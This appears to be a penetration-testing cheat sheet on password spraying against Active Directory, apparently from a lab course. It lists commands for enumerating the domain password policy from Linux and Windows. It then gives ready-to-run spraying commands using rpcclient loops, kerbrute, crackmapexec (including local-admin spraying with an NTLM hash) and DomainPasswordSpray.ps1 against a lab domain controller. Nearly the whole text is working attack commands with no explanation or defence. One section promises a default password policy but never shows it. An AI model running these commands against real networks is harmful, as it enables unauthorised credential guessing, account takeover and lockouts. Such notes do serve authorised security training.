Password Spraying

Password Policy#

The default password policy when a new domain is created is as follows, and there have been plenty of organizations that never changed this policy:

Enumerating the Password Policy - from Linux#

crackmapexec smb 172.16.5.5 -u avazquez -p Password123 --pass-pol

rpcclient -U "" -N 172.16.5.5

rpcclient $> querydominfo
rpcclient $> getdompwinfo

enum4linux -P 172.16.5.5

enum4linux-ng -P 172.16.5.5 -oA enum4linuxOutput

ldapsearch -h 172.16.5.5 -x -b "DC=EXAMPLE,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

Enumerating the Password Policy - from Windows#

C:\kryot> net accounts

PS C:\htb> import-module .\PowerView.ps1
PS C:\htb> Get-DomainPolicy

Password Spraying#

Internal Password Spraying - from Linux#

Bash oneliner

for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done

Kerbrute

kerbrute passwordspray -d example.local --dc 172.16.5.5 valid_users.txt  Welcome1

Crackmapexec

sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +

Local Admin Spraying with CrackMapExec

sudo crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +

Internal Password Spraying - from Windows#

DomainPasswordSpray.ps1

PS C:\kryot> Import-Module .\DomainPasswordSpray.ps1
PS C:\kryot> Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue

Kerbrute.exe

kerbrute.exe passwordspray -d example.local --dc 172.16.5.5 valid_users.txt  Welcome1